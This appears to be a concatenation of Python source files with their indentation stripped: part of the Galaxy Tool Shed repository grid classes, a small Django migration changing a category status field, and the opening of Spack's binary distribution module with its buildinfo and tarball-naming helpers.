group = uga.group
for gra in group.roles:
clause_list.append(model.Role.table.c.id == gra.role_id)
# Filter out repositories for which the user does not have the administrative role either directly
# via a role association or indirectly via a group -> role association.
return (
trans.sa_session.query(model.Repository)
.filter(model.Repository.table.c.deleted == false())
.outerjoin(model.RepositoryRoleAssociation.table)
.outerjoin(model.Role.table)
.filter(or_(*clause_list))
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
)
class RepositoriesMissingToolTestComponentsGrid(RepositoryGrid):
# This grid displays only the latest installable revision of each repository.
title = "Repositories with missing tool test components"
columns = [
RepositoryGrid.NameColumn(
"Name",
key="name",
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
),
RepositoryGrid.LatestInstallableRevisionColumn("Latest Installable Revision"),
RepositoryGrid.UserColumn(
"Owner",
key="User.username",
model_class=model.User,
link=(lambda item: dict(operation="repositories_by_user", id=item.id)),
attach_popup=False,
),
]
columns.append(
grids.MulticolFilterColumn(
"Search repository name",
cols_to_filter=[columns[0]],
key="free-text-search",
visible=False,
filterable="standard",
)
)
def build_initial_query(self, trans, **kwd):
# Filter by latest installable revisions that contain tools with missing tool test components.
revision_clause_list = []
for repository in trans.sa_session.query(model.Repository).filter(
and_(model.Repository.table.c.deprecated == false(), model.Repository.table.c.deleted == false())
):
changeset_revision = (
grids_util.filter_by_latest_downloadable_changeset_revision_that_has_missing_tool_test_components(
trans, repository
)
)
if changeset_revision:
revision_clause_list.append(model.RepositoryMetadata.table.c.changeset_revision == changeset_revision)
if revision_clause_list:
return (
trans.sa_session.query(model.Repository)
.filter(
and_(model.Repository.table.c.deprecated == false(), model.Repository.table.c.deleted == false())
)
.join(model.RepositoryMetadata)
.filter(or_(*revision_clause_list))
.join(model.User.table)
)
# Return an empty query.
return trans.sa_session.query(model.Repository).filter(model.Repository.table.c.id < 0)
class MyWritableRepositoriesMissingToolTestComponentsGrid(RepositoriesMissingToolTestComponentsGrid):
# This grid displays only the latest installable revision of each repository.
title = "Repositories I can change with missing tool test components"
columns = [col for col in RepositoriesMissingToolTestComponentsGrid.columns]
def build_initial_query(self, trans, **kwd):
# First get all repositories that the current user is authorized to update.
username = trans.user.username
user_clause_list = []
for repository in trans.sa_session.query(model.Repository).filter(
and_(model.Repository.table.c.deprecated == false(), model.Repository.table.c.deleted == false())
):
allow_push = repository.allow_push()
if allow_push:
allow_push_usernames = allow_push.split(",")
if username in allow_push_usernames:
user_clause_list.append(model.Repository.table.c.id == repository.id)
if user_clause_list:
# We have the list of repositories that the current user is authorized to update, so filter
# further by latest installable revisions that contain tools with missing tool test components.
revision_clause_list = []
for repository in (
trans.sa_session.query(model.Repository)
.filter(
and_(model.Repository.table.c.deprecated == false(), model.Repository.table.c.deleted == false())
)
.filter(or_(*user_clause_list))
):
changeset_revision = (
grids_util.filter_by_latest_downloadable_changeset_revision_that_has_missing_tool_test_components(
trans, repository
)
)
if changeset_revision:
revision_clause_list.append(
model.RepositoryMetadata.table.c.changeset_revision == changeset_revision
)
if revision_clause_list:
return (
trans.sa_session.query(model.Repository)
.filter(
and_(
model.Repository.table.c.deprecated == false(), model.Repository.table.c.deleted == false()
)
)
.join(model.User.table)
.filter(or_(*user_clause_list))
.join(model.RepositoryMetadata)
.filter(or_(*revision_clause_list))
)
# Return an empty query.
return trans.sa_session.query(model.Repository).filter(model.Repository.table.c.id < 0)
class DeprecatedRepositoriesIOwnGrid(RepositoriesIOwnGrid):
title = "Deprecated repositories I own"
columns = [
RepositoriesIOwnGrid.NameColumn(
"Name",
key="name",
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
),
RepositoryGrid.TypeColumn("Type"),
RepositoriesIOwnGrid.MetadataRevisionColumn("Metadata<br/>Revisions"),
RepositoriesIOwnGrid.CategoryColumn(
"Category", model_class=model.Category, key="Category.name", attach_popup=False
),
]
columns.append(
grids.MulticolFilterColumn(
"Search repository name",
cols_to_filter=[columns[0]],
key="free-text-search",
visible=False,
filterable="standard",
)
)
def build_initial_query(self, trans, **kwd):
return (
trans.sa_session.query(model.Repository)
.filter(
and_(
model.Repository.table.c.deleted == false(),
model.Repository.table.c.user_id == trans.user.id,
model.Repository.table.c.deprecated == true(),
)
)
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
)
class RepositoriesWithInvalidToolsGrid(RepositoryGrid):
# This grid displays only the latest installable revision of each repository.
class InvalidToolConfigColumn(grids.GridColumn):
def __init__(self, col_name):
grids.GridColumn.__init__(self, col_name)
def get_value(self, trans, grid, repository):
# At the time this grid is displayed we know that the received repository will have invalid tools in its latest changeset revision
# that has associated metadata.
val = ""
repository_metadata = grids_util.get_latest_repository_metadata_if_it_includes_invalid_tools(
trans, repository
)
metadata = repository_metadata.metadata
invalid_tools = metadata.get("invalid_tools", [])
if invalid_tools:
for invalid_tool_config in invalid_tools:
href_str = (
'<a href="load_invalid_tool?repository_id=%s&tool_config=%s&changeset_revision=%s">%s</a>'
% (
trans.security.encode_id(repository.id),
invalid_tool_config,
repository_metadata.changeset_revision,
invalid_tool_config,
)
)
val += href_str
val += "<br/>"
val = val.rstrip("<br/>")
return val
title = "Repositories with invalid tools"
columns = [
InvalidToolConfigColumn("Tool config"),
RepositoryGrid.NameColumn(
"Name",
key="name",
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
),
RepositoryGrid.LatestInstallableRevisionColumn("Latest Metadata Revision"),
RepositoryGrid.UserColumn(
"Owner",
key="User.username",
model_class=model.User,
link=(lambda item: dict(operation="repositories_by_user", id=item.id)),
attach_popup=False,
),
]
def build_initial_query(self, trans, **kwd):
# Filter by latest metadata revisions that contain invalid tools.
revision_clause_list = []
for repository in trans.sa_session.query(model.Repository).filter(
and_(model.Repository.table.c.deprecated == false(), model.Repository.table.c.deleted == false())
):
changeset_revision = grids_util.filter_by_latest_metadata_changeset_revision_that_has_invalid_tools(
trans, repository
)
if changeset_revision:
revision_clause_list.append(model.RepositoryMetadata.table.c.changeset_revision == changeset_revision)
if revision_clause_list:
return (
trans.sa_session.query(model.Repository)
.filter(
and_(model.Repository.table.c.deprecated == false(), model.Repository.table.c.deleted == false())
)
.join(model.RepositoryMetadata)
.filter(or_(*revision_clause_list))
.join(model.User.table)
)
# Return an empty query.
return trans.sa_session.query(model.Repository).filter(model.Repository.table.c.id < 0)
class MyWritableRepositoriesWithInvalidToolsGrid(RepositoriesWithInvalidToolsGrid):
# This grid displays only the latest installable revision of each repository.
title = "Repositories I can change with invalid tools"
columns = [col for col in RepositoriesWithInvalidToolsGrid.columns]
def build_initial_query(self, trans, **kwd):
# First get all repositories that the current user is authorized to update.
username = trans.user.username
user_clause_list = []
for repository in trans.sa_session.query(model.Repository).filter(
and_(model.Repository.table.c.deprecated == false(), model.Repository.table.c.deleted == false())
):
allow_push = repository.allow_push()
if allow_push:
allow_push_usernames = allow_push.split(",")
if username in allow_push_usernames:
user_clause_list.append(model.Repository.table.c.id == repository.id)
if user_clause_list:
# We have the list of repositories that the current user is authorized to update, so filter
# further by latest metadata revisions that contain invalid tools.
revision_clause_list = []
for repository in (
trans.sa_session.query(model.Repository)
.filter(
and_(model.Repository.table.c.deprecated == false(), model.Repository.table.c.deleted == false())
)
.filter(or_(*user_clause_list))
):
changeset_revision = grids_util.filter_by_latest_metadata_changeset_revision_that_has_invalid_tools(
trans, repository
)
if changeset_revision:
revision_clause_list.append(
model.RepositoryMetadata.table.c.changeset_revision == changeset_revision
)
if revision_clause_list:
return (
trans.sa_session.query(model.Repository)
.filter(
and_(
model.Repository.table.c.deprecated == false(), model.Repository.table.c.deleted == false()
)
)
.join(model.User.table)
.filter(or_(*user_clause_list))
.join(model.RepositoryMetadata)
.filter(or_(*revision_clause_list))
)
# Return an empty query.
return trans.sa_session.query(model.Repository).filter(model.Repository.table.c.id < 0)
class RepositoryMetadataGrid(grids.Grid):
class RepositoryNameColumn(grids.TextColumn):
def get_value(self, trans, grid, repository_metadata):
repository = repository_metadata.repository
return escape_html(repository.name)
class RepositoryTypeColumn(grids.TextColumn):
def get_value(self, trans, grid, repository_metadata):
repository = repository_metadata.repository
type_class = repository.get_type_class(trans.app)
return escape_html(type_class.label)
class RepositoryOwnerColumn(grids.TextColumn):
def get_value(self, trans, grid, repository_metadata):
repository = repository_metadata.repository
return escape_html(repository.user.username)
class ChangesetRevisionColumn(grids.TextColumn):
def get_value(self, trans, grid, repository_metadata):
repository = repository_metadata.repository
changeset_revision = repository_metadata.changeset_revision
changeset_revision_label = hg_util.get_revision_label(
trans.app, repository, changeset_revision, include_date=True
)
return changeset_revision_label
class MaliciousColumn(grids.BooleanColumn):
def get_value(self, trans, grid, repository_metadata):
if repository_metadata.malicious:
return "yes"
return ""
class DownloadableColumn(grids.BooleanColumn):
def get_value(self, trans, grid, repository_metadata):
if repository_metadata.downloadable:
return "yes"
return ""
class HasRepositoryDependenciesColumn(grids.BooleanColumn):
def get_value(self, trans, grid, repository_metadata):
if repository_metadata.has_repository_dependencies:
return "yes"
return ""
class IncludesDatatypesColumn(grids.BooleanColumn):
def get_value(self, trans, grid, repository_metadata):
if repository_metadata.includes_datatypes:
return "yes"
return ""
class IncludesToolsColumn(grids.BooleanColumn):
def get_value(self, trans, grid, repository_metadata):
if repository_metadata.includes_tools:
return "yes"
return ""
class IncludesToolDependenciesColumn(grids.BooleanColumn):
def get_value(self, trans, grid, repository_metadata):
if repository_metadata.includes_tool_dependencies:
return "yes"
return ""
class IncludesWorkflowsColumn(grids.BooleanColumn):
def get_value(self, trans, grid, repository_metadata):
if repository_metadata.includes_workflows:
return "yes"
return ""
title = "Repository metadata"
model_class = model.RepositoryMetadata
default_sort_key = "Repository.name"
columns = [
RepositoryNameColumn(
"Repository name",
key="Repository.name",
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
),
RepositoryNameColumn("Type"),
RepositoryOwnerColumn("Owner", model_class=model.User, attach_popup=False, key="User.username"),
]
columns.append(
grids.MulticolFilterColumn(
"Search repository name, description",
cols_to_filter=[columns[0], columns[1]],
key="free-text-search",
visible=False,
filterable="standard",
)
)
default_filter = dict(malicious="False")
num_rows_per_page = 50
use_paging = True
allow_fetching_all_results = False
def build_initial_query(self, trans, **kwd):
return (
trans.sa_session.query(model.RepositoryMetadata)
.join(model.Repository)
.filter(and_(model.Repository.table.c.deleted == false(), model.Repository.table.c.deprecated == false()))
.join(model.User.table)
)
class RepositoryDependenciesGrid(RepositoryMetadataGrid):
class RequiredRepositoryColumn(grids.TextColumn):
def get_value(self, trans, grid, repository_metadata):
rd_str = []
if repository_metadata:
metadata = repository_metadata.metadata
if metadata:
rd_dict = metadata.get("repository_dependencies", {})
if rd_dict:
rd_tups = rd_dict["repository_dependencies"]
# "repository_dependencies": [["http://localhost:9009", "bwa059", "test", "a07baa797d53"]]
                        # Sort rd_tups by required repository name.
sorted_rd_tups = sorted(rd_tups, key=lambda rd_tup: rd_tup[1])
for rd_tup in sorted_rd_tups:
name, owner, changeset_revision = rd_tup[1:4]
rd_line = ""
required_repository = repository_util.get_repository_by_name_and_owner(
trans.app, name, owner
)
if required_repository and not required_repository.deleted:
required_repository_id = trans.security.encode_id(required_repository.id)
required_repository_metadata = (
metadata_util.get_repository_metadata_by_repository_id_changeset_revision(
trans.app, required_repository_id, changeset_revision
)
)
if not required_repository_metadata:
updated_changeset_revision = metadata_util.get_next_downloadable_changeset_revision(
trans.app, required_repository, changeset_revision
)
required_repository_metadata = (
metadata_util.get_repository_metadata_by_repository_id_changeset_revision(
trans.app, required_repository_id, updated_changeset_revision
)
)
required_repository_metadata_id = trans.security.encode_id(
required_repository_metadata.id
)
rd_line += f'<a href="browse_repository_dependencies?operation=view_or_manage_repository&id={required_repository_metadata_id}">'
rd_line += f"Repository <b>{escape_html(name)}</b> revision <b>{escape_html(owner)}</b> owned by <b>{escape_html(changeset_revision)}</b>"
if required_repository:
rd_line += "</a>"
rd_str.append(rd_line)
return "<br />".join(rd_str)
title = "Valid repository dependency definitions in this tool shed"
default_sort_key = "Repository.name"
columns = [
RequiredRepositoryColumn("Repository dependency", attach_popup=False),
RepositoryMetadataGrid.RepositoryNameColumn(
"Repository name",
model_class=model.Repository,
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
key="Repository.name",
),
RepositoryMetadataGrid.RepositoryOwnerColumn(
"Owner", model_class=model.User, attach_popup=False, key="User.username"
),
RepositoryMetadataGrid.ChangesetRevisionColumn("Revision", attach_popup=False),
]
columns.append(
grids.MulticolFilterColumn(
"Search repository name, owner",
cols_to_filter=[columns[1], columns[2]],
key="free-text-search",
visible=False,
filterable="standard",
)
)
def build_initial_query(self, trans, **kwd):
return (
trans.sa_session.query(model.RepositoryMetadata)
.join(model.Repository)
.filter(
and_(
model.RepositoryMetadata.table.c.has_repository_dependencies == true(),
model.Repository.table.c.deleted == false(),
model.Repository.table.c.deprecated == false(),
)
)
.join(model.User.table)
)
class DatatypesGrid(RepositoryMetadataGrid):
class DatatypesColumn(grids.TextColumn):
def get_value(self, trans, grid, repository_metadata):
datatype_list = []
if repository_metadata:
metadata = repository_metadata.metadata
if metadata:
datatype_dicts = metadata.get("datatypes", [])
if datatype_dicts:
# Create tuples of the attributes we want so we can sort them by extension.
datatype_tups = []
for datatype_dict in datatype_dicts:
# Example: {"display_in_upload": "true", "dtype": "galaxy.datatypes.blast:BlastXml", "extension": "blastxml", "mimetype": "application/xml"}
extension = datatype_dict.get("extension", "")
dtype = datatype_dict.get("dtype", "")
# For now we'll just display extension and dtype.
if extension and dtype:
datatype_tups.append((extension, dtype))
sorted_datatype_tups = sorted(datatype_tups, key=lambda datatype_tup: datatype_tup[0])
for datatype_tup in sorted_datatype_tups:
extension, datatype = datatype_tup[:2]
datatype_str = f'<a href="browse_datatypes?operation=view_or_manage_repository&id={trans.security.encode_id(repository_metadata.id)}">'
datatype_str += f"<b>{escape_html(extension)}:</b> {escape_html(datatype)}"
datatype_str += "</a>"
datatype_list.append(datatype_str)
return "<br />".join(datatype_list)
title = "Custom datatypes in this tool shed"
default_sort_key = "Repository.name"
columns = [
DatatypesColumn("Datatype extension and class", attach_popup=False),
RepositoryMetadataGrid.RepositoryNameColumn(
"Repository name",
model_class=model.Repository,
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
key="Repository.name",
),
RepositoryMetadataGrid.RepositoryOwnerColumn(
"Owner", model_class=model.User, attach_popup=False, key="User.username"
),
RepositoryMetadataGrid.ChangesetRevisionColumn("Revision", attach_popup=False),
]
columns.append(
grids.MulticolFilterColumn(
"Search repository name, owner",
cols_to_filter=[columns[1], columns[2]],
key="free-text-search",
visible=False,
filterable="standard",
)
)
def build_initial_query(self, trans, **kwd):
return (
trans.sa_session.query(model.RepositoryMetadata)
.join(model.Repository)
.filter(
and_(
model.RepositoryMetadata.table.c.includes_datatypes == true(),
model.Repository.table.c.deleted == false(),
model.Repository.table.c.deprecated == false(),
)
)
.join(model.User.table)
)
class ToolDependenciesGrid(RepositoryMetadataGrid):
class ToolDependencyColumn(grids.TextColumn):
def get_value(self, trans, grid, repository_metadata):
td_str = ""
if repository_metadata:
metadata = repository_metadata.metadata
if metadata:
tds_dict = metadata.get("tool_dependencies", {})
if tds_dict:
# Example: {"bwa/0.5.9": {"name": "bwa", "type": "package", "version": "0.5.9"}}
sorted_keys = sorted(tds_dict.keys())
num_keys = len(sorted_keys)
# Handle environment settings first.
if "set_environment" in sorted_keys:
# Example: "set_environment": [{"name": "JAVA_JAR_FILE", "type": "set_environment"}]
env_dicts = tds_dict["set_environment"]
num_env_dicts = len(env_dicts)
if num_env_dicts > 0:
td_str += f'<a href="browse_datatypes?operation=view_or_manage_repository&id={trans.security.encode_id(repository_metadata.id)}">'
td_str += "<b>environment:</b> "
td_str += ", ".join(escape_html(env_dict["name"]) for env_dict in env_dicts)
td_str += "</a><br/>"
for index, key in enumerate(sorted_keys):
if key == "set_environment":
continue
td_dict = tds_dict[key]
# Example: {"name": "bwa", "type": "package", "version": "0.5.9"}
name = td_dict["name"]
version = td_dict["version"]
td_str += f'<a href="browse_datatypes?operation=view_or_manage_repository&id={trans.security.encode_id(repository_metadata.id)}">'
td_str += f"<b>{escape_html(name)}</b> version <b>{escape_html(version)}</b>"
td_str += "</a>"
if index < num_keys - 1:
td_str += "<br/>"
return td_str
title = "Tool dependency definitions in this tool shed"
default_sort_key = "Repository.name"
columns = [
ToolDependencyColumn("Tool dependency", attach_popup=False),
RepositoryMetadataGrid.RepositoryNameColumn(
"Repository name",
model_class=model.Repository,
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
key="Repository.name",
),
RepositoryMetadataGrid.RepositoryOwnerColumn(
"Owner", model_class=model.User, attach_popup=False, key="User.username"
),
RepositoryMetadataGrid.ChangesetRevisionColumn("Revision", attach_popup=False),
]
columns.append(
grids.MulticolFilterColumn(
"Search repository name, owner",
cols_to_filter=[columns[1], columns[2]],
key="free-text-search",
visible=False,
filterable="standard",
)
)
def build_initial_query(self, trans, **kwd):
return (
trans.sa_session.query(model.RepositoryMetadata)
.join(model.Repository)
.filter(
and_(
model.RepositoryMetadata.table.c.includes_tool_dependencies == true(),
model.Repository.table.c.deleted == false(),
model.Repository.table.c.deprecated == false(),
)
)
.join(model.User.table)
)
class ToolsGrid(RepositoryMetadataGrid):
class ToolsColumn(grids.TextColumn):
def get_value(self, trans, grid, repository_metadata):
tool_line = []
if repository_metadata:
metadata = repository_metadata.metadata
if metadata:
tool_dicts = metadata.get("tools", [])
if tool_dicts:
# Create tuples of the attributes we want so we can sort them by extension.
tool_tups = []
for tool_dict in tool_dicts:
tool_id = tool_dict.get("id", "")
version = tool_dict.get("version", "")
# For now we'll just display tool id and version.
if tool_id and version:
tool_tups.append((tool_id, version))
sorted_tool_tups = sorted(tool_tups, key=lambda tool_tup: tool_tup[0])
for tool_tup in sorted_tool_tups:
tool_id, version = tool_tup[:2]
tool_str = f'<a href="browse_datatypes?operation=view_or_manage_repository&id={trans.security.encode_id(repository_metadata.id)}">'
tool_str += f"<b>{escape_html(tool_id)}:</b> {escape_html(version)}"
tool_str += "</a>"
tool_line.append(tool_str)
return "<br />".join(tool_line)
title = "Valid tools in this tool shed"
default_sort_key = "Repository.name"
columns = [
ToolsColumn("Tool id and version", attach_popup=False),
RepositoryMetadataGrid.RepositoryNameColumn(
"Repository name",
model_class=model.Repository,
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
key="Repository.name",
),
RepositoryMetadataGrid.RepositoryOwnerColumn(
"Owner", model_class=model.User, attach_popup=False, key="User.username"
),
RepositoryMetadataGrid.ChangesetRevisionColumn("Revision", attach_popup=False),
]
columns.append(
grids.MulticolFilterColumn(
"Search repository name, owner",
cols_to_filter=[columns[1], columns[2]],
key="free-text-search",
visible=False,
filterable="standard",
)
)
def build_initial_query(self, trans, **kwd):
return (
trans.sa_session.query(model.RepositoryMetadata)
.join(model.Repository)
.filter(
and_(
model.RepositoryMetadata.table.c.includes_tools == true(),
model.Repository.table.c.deleted == false(),
model.Repository.table.c.deprecated == false(),
)
)
.join(model.User.table)
)
class ValidCategoryGrid(CategoryGrid):
class RepositoriesColumn(grids.TextColumn):
def get_value(self, trans, grid, category):
category_name = str(category.name)
filter = trans.app.repository_grid_filter_manager.get_filter(trans)
if filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE:
return (
trans.app.repository_registry.certified_level_one_viewable_repositories_and_suites_by_category.get(
category_name, 0
)
)
elif filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE_SUITES:
return trans.app.repository_registry.certified_level_one_viewable_suites_by_category.get(
category_name, 0
)
elif filter == trans.app.repository_grid_filter_manager.filters.SUITES:
return trans.app.repository_registry.viewable_valid_suites_by_category.get(category_name, 0)
else:
                # The value of filter is None.
return trans.app.repository_registry.viewable_valid_repositories_and_suites_by_category.get(
category_name, 0
)
title = "Categories of Valid Repositories"
model_class = model.Category
template = "/webapps/tool_shed/category/valid_grid.mako"
default_sort_key = "name"
columns = [
CategoryGrid.NameColumn(
"Name",
key="Category.name",
link=(lambda item: dict(operation="valid_repositories_by_category", id=item.id)),
attach_popup=False,
),
CategoryGrid.DescriptionColumn("Description", key="Category.description", attach_popup=False),
# Columns that are valid for filtering but are not visible.
RepositoriesColumn("Valid repositories", model_class=model.Repository, attach_popup=False),
]
# Override these
num_rows_per_page = 50
class ValidRepositoryGrid(RepositoryGrid):
# This grid filters out repositories that have been marked as either deleted or deprecated.
class CategoryColumn(grids.TextColumn):
def get_value(self, trans, grid, repository):
rval = "<ul>"
if repository.categories:
for rca in repository.categories:
rval += (
'<li><a href="browse_repositories?operation=valid_repositories_by_category&id=%s">%s</a></li>'
% (trans.security.encode_id(rca.category.id), rca.category.name)
)
else:
rval += "<li>not set</li>"
rval += "</ul>"
return rval
class RepositoryCategoryColumn(grids.GridColumn):
def filter(self, trans, user, query, column_filter):
"""Modify query to filter by category."""
if column_filter == "All":
return query
return query.filter(model.Category.name == column_filter)
class InstallableRevisionColumn(grids.GridColumn):
def __init__(self, col_name):
grids.GridColumn.__init__(self, col_name)
def get_value(self, trans, grid, repository):
"""Display a SelectField whose options are the changeset_revision strings of all download-able revisions of this repository."""
select_field = grids_util.build_changeset_revision_select_field(trans, repository, downloadable=True)
if len(select_field.options) > 1:
tmpl = f"<select name='{select_field.name}'>"
for o in select_field.options:
tmpl += f"<option value='{o[1]}'>{o[0]}</option>"
tmpl += "</select>"
return tmpl
elif len(select_field.options) == 1:
return select_field.options[0][0]
return ""
title = "Valid Repositories"
columns = [
RepositoryGrid.NameColumn("Name", key="name", attach_popup=True),
RepositoryGrid.DescriptionColumn("Synopsis", key="description", attach_popup=False),
RepositoryGrid.TypeColumn("Type"),
InstallableRevisionColumn("Installable Revisions"),
RepositoryGrid.UserColumn("Owner", model_class=model.User, attach_popup=False),
# Columns that are valid for filtering but are not visible.
RepositoryCategoryColumn("Category", model_class=model.Category, key="Category.name", visible=False),
]
columns.append(
grids.MulticolFilterColumn(
"Search repository name, description",
cols_to_filter=[columns[0], columns[1]],
key="free-text-search",
visible=False,
filterable="standard",
)
)
def build_initial_query(self, trans, **kwd):
filter = trans.app.repository_grid_filter_manager.get_filter(trans)
if "id" in kwd:
# The user is browsing categories of valid repositories, so filter the request by the received id,
# which is a category id.
if filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE:
return (
trans.sa_session.query(model.Repository)
.join(model.RepositoryMetadata.table)
.filter(or_(*trans.app.repository_registry.certified_level_one_clause_list))
.join(model.User.table)
.join(model.RepositoryCategoryAssociation.table)
.join(model.Category.table)
.filter(
and_(
model.Category.table.c.id == trans.security.decode_id(kwd["id"]),
model.RepositoryMetadata.table.c.downloadable == true(),
)
)
)
if filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE_SUITES:
return (
trans.sa_session.query(model.Repository)
.filter(model.Repository.type == rt_util.REPOSITORY_SUITE_DEFINITION)
.join(model.RepositoryMetadata.table)
.filter(or_(*trans.app.repository_registry.certified_level_one_clause_list))
.join(model.User.table)
.join(model.RepositoryCategoryAssociation.table)
.join(model.Category.table)
.filter(
and_(
model.Category.table.c.id == trans.security.decode_id(kwd["id"]),
model.RepositoryMetadata.table.c.downloadable == true(),
)
)
)
else:
# The value of filter is None.
return (
trans.sa_session.query(model.Repository)
.filter(
and_(
model.Repository.table.c.deleted == false(), model.Repository.table.c.deprecated == false()
)
)
.join(model.RepositoryMetadata.table)
.join(model.User.table)
.join(model.RepositoryCategoryAssociation.table)
.join(model.Category.table)
.filter(
and_(
model.Category.table.c.id == trans.security.decode_id(kwd["id"]),
model.RepositoryMetadata.table.c.downloadable == true(),
)
)
)
# The user performed a free text search on the ValidCategoryGrid.
if filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE:
return (
trans.sa_session.query(model.Repository)
.join(model.RepositoryMetadata.table)
.filter(or_(*trans.app.repository_registry.certified_level_one_clause_list))
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
.filter(model.RepositoryMetadata.table.c.downloadable == true())
)
if filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE_SUITES:
return (
trans.sa_session.query(model.Repository)
.filter(model.Repository.type == rt_util.REPOSITORY_SUITE_DEFINITION)
.join(model.RepositoryMetadata.table)
.filter(or_(*trans.app.repository_registry.certified_level_one_clause_list))
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
.filter(model.RepositoryMetadata.table.c.downloadable == true())
)
else:
# The value of filter is None.
return (
trans.sa_session.query(model.Repository)
.filter(
and_(model.Repository.table.c.deleted == false(), model.Repository.table.c.deprecated == false())
)
.join(model.RepositoryMetadata.table)
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
.filter(model.RepositoryMetadata.table.c.downloadable == true())
)
|
py | 7df8012753e5780d7063130084a86eaeddf41b8e | # Generated by Django 2.1.7 on 2019-04-11 04:47
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dashboard', '0005_auto_20190411_1038'),
]
operations = [
migrations.AlterField(
model_name='category',
name='category_status',
field=models.CharField(choices=[('', 'Select Status'), ('Active', 'Active'), ('Inactive', 'Inactive')], default='', max_length=10),
),
]
|
py | 7df8016f18e0c1257fe6b9c942b8087d8c59a557 | # Copyright 2013-2018 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import os
import re
import tarfile
import shutil
import platform
import tempfile
import hashlib
from contextlib import closing
import ruamel.yaml as yaml
import llnl.util.tty as tty
from llnl.util.filesystem import mkdirp, install_tree, get_filetype
import spack.cmd
import spack.config
import spack.error
import spack.fetch_strategy as fs
import spack.relocate as relocate
import spack.store
import spack.util.gpg as gpg_util
from spack.stage import Stage
from spack.util.gpg import Gpg
from spack.util.web import spider
from spack.util.executable import ProcessError
class NoOverwriteException(Exception):
"""
    Raised when a file already exists and would be overwritten, but the force option was not given.
"""
def __init__(self, file_path):
err_msg = "\n%s\nexists\n" % file_path
err_msg += "Use -f option to overwrite."
super(NoOverwriteException, self).__init__(err_msg)
class NoGpgException(spack.error.SpackError):
"""
Raised when gpg2 is not in PATH
"""
pass
class NoKeyException(spack.error.SpackError):
"""
Raised when gpg has no default key added.
"""
pass
class PickKeyException(spack.error.SpackError):
"""
Raised when multiple keys can be used to sign.
"""
def __init__(self, keys):
err_msg = "Multi keys available for signing\n%s\n" % keys
err_msg += "Use spack buildcache create -k <key hash> to pick a key."
super(PickKeyException, self).__init__(err_msg)
class NoVerifyException(spack.error.SpackError):
"""
Raised if file fails signature verification.
"""
pass
class NoChecksumException(spack.error.SpackError):
"""
Raised if file fails checksum verification.
"""
pass
class NewLayoutException(spack.error.SpackError):
"""
Raised if directory layout is different from buildcache.
"""
pass
def has_gnupg2():
try:
gpg_util.Gpg.gpg()('--version', output=os.devnull)
return True
except ProcessError:
return False
def buildinfo_file_name(prefix):
"""
Filename of the binary package meta-data file
"""
name = prefix + "/.spack/binary_distribution"
return name
def read_buildinfo_file(prefix):
"""
Read buildinfo file
"""
filename = buildinfo_file_name(prefix)
with open(filename, 'r') as inputfile:
content = inputfile.read()
buildinfo = yaml.load(content)
return buildinfo
def write_buildinfo_file(prefix, workdir, rel=False):
"""
Create a cache file containing information
required for the relocation
"""
text_to_relocate = []
binary_to_relocate = []
blacklist = (".spack", "man")
os_id = platform.system()
    # Do this during tarball creation to save time when the tarball is unpacked.
# Used by make_package_relative to determine binaries to change.
for root, dirs, files in os.walk(prefix, topdown=True):
dirs[:] = [d for d in dirs if d not in blacklist]
for filename in files:
path_name = os.path.join(root, filename)
# Check if the file contains a string with the installroot.
# This cuts down on the number of files added to the list
# of files potentially needing relocation
if relocate.strings_contains_installroot(
path_name, spack.store.layout.root):
filetype = get_filetype(path_name)
if relocate.needs_binary_relocation(filetype, os_id):
rel_path_name = os.path.relpath(path_name, prefix)
binary_to_relocate.append(rel_path_name)
elif relocate.needs_text_relocation(filetype):
rel_path_name = os.path.relpath(path_name, prefix)
text_to_relocate.append(rel_path_name)
# Create buildinfo data and write it to disk
buildinfo = {}
buildinfo['relative_rpaths'] = rel
buildinfo['buildpath'] = spack.store.layout.root
buildinfo['relative_prefix'] = os.path.relpath(
prefix, spack.store.layout.root)
buildinfo['relocate_textfiles'] = text_to_relocate
buildinfo['relocate_binaries'] = binary_to_relocate
filename = buildinfo_file_name(workdir)
with open(filename, 'w') as outfile:
outfile.write(yaml.dump(buildinfo, default_flow_style=True))
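# For reference, a sketch of the buildinfo document written above (flow-style
# YAML because of default_flow_style=True); the concrete paths are made-up
# examples, only the keys come from this function:
#
#   {relative_rpaths: false, buildpath: /opt/spack/opt/spack,
#    relative_prefix: linux-ubuntu18.04-x86_64/gcc-7.3.0/zlib-1.2.11-abc123,
#    relocate_textfiles: [lib/pkgconfig/zlib.pc],
#    relocate_binaries: [lib/libz.so.1.2.11]}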
def tarball_directory_name(spec):
"""
Return name of the tarball directory according to the convention
<os>-<architecture>/<compiler>/<package>-<version>/
"""
return "%s/%s/%s-%s" % (spec.architecture,
str(spec.compiler).replace("@", "-"),
spec.name, spec.version)
def tarball_name(spec, ext):
"""
    Return the name of the tarball according to the convention
    <architecture>-<compiler>-<package>-<version>-<dag_hash><ext>
"""
return "%s-%s-%s-%s-%s%s" % (spec.architecture,
